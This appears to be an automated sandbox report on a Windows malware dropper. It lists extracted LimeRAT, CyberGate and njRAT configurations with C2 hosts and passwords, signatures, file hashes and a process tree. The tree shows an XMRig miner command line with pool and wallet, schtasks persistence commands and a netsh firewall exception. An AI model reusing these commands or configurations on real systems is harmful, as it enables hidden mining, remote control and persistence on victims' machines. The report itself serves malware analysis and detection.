Analysis
-
max time kernel
24s -
max time network
168s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
25-05-2022 01:11
Static task
static1
Behavioral task
behavioral1
Sample
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
Resource
win7-20220414-en
General
-
Target
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
-
Size
12.1MB
-
MD5
dfd75a7bf3505b1451149b8d73a359ae
-
SHA1
8db9aa88468ce61ffa43eaa195aff0eb359310b6
-
SHA256
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
-
SHA512
2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365
Malware Config
Extracted
limerat
1JBKLGyE6AnRGvk92A8x3m8qmXfh3fcEty
-
aes_key
nulled
-
antivm
true
-
c2_url
https://pastebin.com/raw/TFJdDnm6
-
delay
33
-
download_payload
false
-
install
false
-
install_name
Wservices.exe
-
main_folder
Temp
-
pin_spread
true
-
sub_folder
\
-
usb_spread
true
Extracted
cybergate
v1.05.1
noIP
red4.hopto.org:1552
8RJNIFAYVRO133
-
enable_keylogger
true
-
enable_message_box
false
-
ftp_directory
./logs/
-
ftp_interval
30
-
injected_process
explorer.exe
-
install_dir
SkypeUpdate
-
install_file
Skype.exe
-
install_flag
false
-
keylogger_enable_ftp
false
-
message_box_caption
Remote Administration anywhere in the world.
-
message_box_title
CyberGate
-
password
12345
-
regkey_hkcu
Adobefinder
Extracted
njrat
0.7d
noipchiper
red4.hopto.org:5553
ede4594ea0284ffc20ba188f3b2099c0
-
reg_key
ede4594ea0284ffc20ba188f3b2099c0
-
splitter
|'|'|
Signatures
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe xmrig C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe xmrig -
Executes dropped EXE 10 IoCs
Processes:
moxia.EXEc.exeli4.exemoxiacyb.exen.exeLegion Elite Proxies Grabber v1.exec.exeEATLFEPWN.exec.exec.exepid process 2008 moxia.EXE 3004 c.exe 4708 li4.exe 2172 moxiacyb.exe 4920 n.exe 1040 Legion Elite Proxies Grabber v1.exe 408 c.exe 1668 EATLFEPWN.exe 5104 c.exe 4272 c.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule behavioral2/memory/5104-192-0x0000000010410000-0x0000000010471000-memory.dmp upx behavioral2/memory/408-189-0x0000000010410000-0x0000000010471000-memory.dmp upx behavioral2/memory/5104-196-0x0000000010410000-0x0000000010471000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
n.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion n.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exec.exeli4.exec.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation c.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation li4.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation c.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
moxia.EXEmoxiacyb.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce moxia.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" moxia.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" moxiacyb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
AutoIT Executable 24 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\li4.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\li4.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\n.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\n.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Roaming\Spectrum\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\Spectrum\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\Spectrum\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\efsui\data.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Roaming\efsui\data.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\li4.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\n.exe autoit_exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
li4.exec.exe4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exedescription pid process target process PID 4708 set thread context of 2128 4708 li4.exe RegSvcs.exe PID 3004 set thread context of 408 3004 c.exe c.exe PID 3232 set thread context of 2064 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3452 4076 WerFault.exe SystemProcess.exe 1888 4644 WerFault.exe SystemProcess.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4056 schtasks.exe 608 schtasks.exe 4052 schtasks.exe 4772 schtasks.exe 4476 schtasks.exe 3720 schtasks.exe 4560 schtasks.exe 4904 schtasks.exe 3756 schtasks.exe 3480 schtasks.exe 5036 schtasks.exe 3968 schtasks.exe 824 schtasks.exe 3784 schtasks.exe 3784 schtasks.exe 384 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
n.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer n.exe -
NTFS ADS 1 IoCs
Processes:
n.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 n.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
c.exepid process 5104 c.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
EATLFEPWN.exec.exedescription pid process Token: SeLockMemoryPrivilege 1668 EATLFEPWN.exe Token: SeLockMemoryPrivilege 1668 EATLFEPWN.exe Token: SeDebugPrivilege 5104 c.exe Token: SeDebugPrivilege 5104 c.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exemoxia.EXEli4.exec.exemoxiacyb.exec.exedescription pid process target process PID 3232 wrote to memory of 2008 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 3232 wrote to memory of 2008 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 3232 wrote to memory of 2008 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 3232 wrote to memory of 3004 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe c.exe PID 3232 wrote to memory of 3004 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe c.exe PID 3232 wrote to memory of 3004 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe c.exe PID 3232 wrote to memory of 4708 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe li4.exe PID 3232 wrote to memory of 4708 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe li4.exe PID 3232 wrote to memory of 4708 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe li4.exe PID 2008 wrote to memory of 2172 2008 moxia.EXE moxiacyb.exe PID 2008 wrote to memory of 2172 2008 moxia.EXE moxiacyb.exe PID 3232 wrote to memory of 4920 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe n.exe PID 3232 wrote to memory of 4920 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe n.exe PID 3232 wrote to memory of 4920 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe n.exe PID 3232 wrote to memory of 1040 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe Legion Elite Proxies Grabber v1.exe PID 3232 wrote to memory of 1040 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe Legion Elite Proxies Grabber v1.exe PID 3232 wrote to memory of 1040 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe Legion Elite Proxies Grabber v1.exe PID 4708 wrote to memory of 2128 4708 li4.exe RegSvcs.exe PID 4708 wrote to memory of 2128 4708 li4.exe RegSvcs.exe PID 4708 wrote to memory of 2128 4708 li4.exe RegSvcs.exe PID 4708 wrote to memory of 2128 4708 li4.exe RegSvcs.exe PID 3004 wrote to memory of 408 3004 c.exe c.exe PID 3004 wrote to memory of 408 3004 c.exe c.exe PID 3004 wrote to memory of 408 3004 c.exe c.exe PID 4708 wrote to memory of 2128 4708 li4.exe RegSvcs.exe PID 3004 wrote to memory of 408 3004 c.exe c.exe PID 2172 wrote to memory of 3784 2172 moxiacyb.exe schtasks.exe PID 2172 wrote to memory of 3784 2172 moxiacyb.exe schtasks.exe PID 2172 wrote to memory of 3756 2172 moxiacyb.exe schtasks.exe PID 2172 wrote to memory of 3756 2172 moxiacyb.exe schtasks.exe PID 2172 wrote to memory of 1668 2172 moxiacyb.exe EATLFEPWN.exe PID 2172 wrote to memory of 1668 2172 moxiacyb.exe EATLFEPWN.exe PID 2172 wrote to memory of 1668 2172 moxiacyb.exe EATLFEPWN.exe PID 3004 wrote to memory of 408 3004 c.exe c.exe PID 3232 wrote to memory of 2064 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 3232 wrote to memory of 2064 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 3232 wrote to memory of 2064 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 3232 wrote to memory of 2064 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 3232 wrote to memory of 2064 3232 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe PID 408 wrote to memory of 5104 408 c.exe c.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\moxia.EXE"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 14⤵
- Creates scheduled task(s)
PID:3784
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 14⤵
- Creates scheduled task(s)
PID:3756
-
-
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exeC:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 554⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5104 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"5⤵
- Executes dropped EXE
PID:4272
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:3720
-
-
-
C:\Users\Admin\AppData\Local\Temp\li4.exe"C:\Users\Admin\AppData\Local\Temp\li4.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:2128
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:4476
-
-
-
C:\Users\Admin\AppData\Local\Temp\n.exe"C:\Users\Admin\AppData\Local\Temp\n.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates system info in registry
- NTFS ADS
PID:4920 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵PID:2604
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE4⤵PID:556
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:608
-
-
-
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"2⤵
- Executes dropped EXE
PID:1040
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:2064
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:824
-
-
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exeC:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe1⤵PID:4548
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:2124
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:4056
-
-
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exeC:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe1⤵PID:4596
-
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"2⤵PID:568
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:4560
-
-
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exeC:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe1⤵PID:4076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 12⤵
- Creates scheduled task(s)
PID:3480
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 12⤵
- Creates scheduled task(s)
PID:3784
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4076 -s 8002⤵
- Program crash
PID:3452
-
-
C:\Users\Admin\AppData\Roaming\Spectrum\service.exeC:\Users\Admin\AppData\Roaming\Spectrum\service.exe1⤵PID:3276
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:408
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:384
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 416 -p 4076 -ip 40761⤵PID:220
-
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exeC:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe1⤵PID:4644
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4644 -s 8002⤵
- Program crash
PID:1888
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 12⤵
- Creates scheduled task(s)
PID:5036
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 12⤵
- Creates scheduled task(s)
PID:4904
-
-
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exeC:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe1⤵PID:4188
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:4764
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:3968
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 484 -p 4644 -ip 46441⤵PID:2396
-
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exeC:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe1⤵PID:5068
-
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"2⤵PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:4052
-
-
C:\Users\Admin\AppData\Roaming\Spectrum\service.exeC:\Users\Admin\AppData\Roaming\Spectrum\service.exe1⤵PID:3132
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:1280
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:4772
-
-
C:\Users\Admin\AppData\Roaming\efsui\data.exeC:\Users\Admin\AppData\Roaming\efsui\data.exe1⤵PID:1392
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:2800
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.5MB
MD5398ec8f86f7fa6496441719de64b247a
SHA116906927268cc0d1c4722f6f2dc2045f8725826c
SHA2567de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e
-
Filesize
6.5MB
MD5398ec8f86f7fa6496441719de64b247a
SHA116906927268cc0d1c4722f6f2dc2045f8725826c
SHA2567de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e
-
Filesize
1.4MB
MD58e42b462d64f31e8f8b90f121a873b39
SHA17debe9f369937f1d17a8bb9e813b912b0ada1ead
SHA25605be1d1b144d3b044d98eb75acabc7b688d4b5d3535ed340afa0e97f9bca4112
SHA51261fc2e12e86677bb202e10999ade1299df1c93b3048577aee5a087ec37e6fb675443f5b4afa51d900ce7db3d9c94fcb02822215d7b613d4004e155dddf429329
-
Filesize
316B
MD59f893d94b017a0684012d50319c9ffbe
SHA1140cc2cb6b2520ba4f9a1f666a5f679853472793
SHA2568a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec
SHA5124b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba
-
Filesize
415B
MD5657f403a19497b80aefa11dfb75f4600
SHA1c2c296140be72560a9602b8e918133f7991f65b3
SHA256415830b94630e82b4460b4ff755a3049cb5558f30a5660d6923f61f3af7cd53c
SHA512346e28c3fbd3e92b8b9a4ececeb45278bff97091e45c3519a42b7348cb826840a131d35db77b11e7537fab6bbc8da3eb8a99eae31168812ca45f20f1eebcfe04
-
Filesize
6.5MB
MD5398ec8f86f7fa6496441719de64b247a
SHA116906927268cc0d1c4722f6f2dc2045f8725826c
SHA2567de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e
-
Filesize
6.5MB
MD5398ec8f86f7fa6496441719de64b247a
SHA116906927268cc0d1c4722f6f2dc2045f8725826c
SHA2567de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e
-
Filesize
2.4MB
MD5222f649af364623037bda8ee9df02945
SHA1f5e1ecb12628b69eeb29ab47d64283122316bd5e
SHA2560b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30
SHA512c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64
-
Filesize
2.4MB
MD5222f649af364623037bda8ee9df02945
SHA1f5e1ecb12628b69eeb29ab47d64283122316bd5e
SHA2560b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30
SHA512c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64
-
Filesize
704KB
MD5a38702ff13a83f2177bb45d99f4f6e4e
SHA1198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA51250037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3
-
Filesize
704KB
MD5a38702ff13a83f2177bb45d99f4f6e4e
SHA1198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
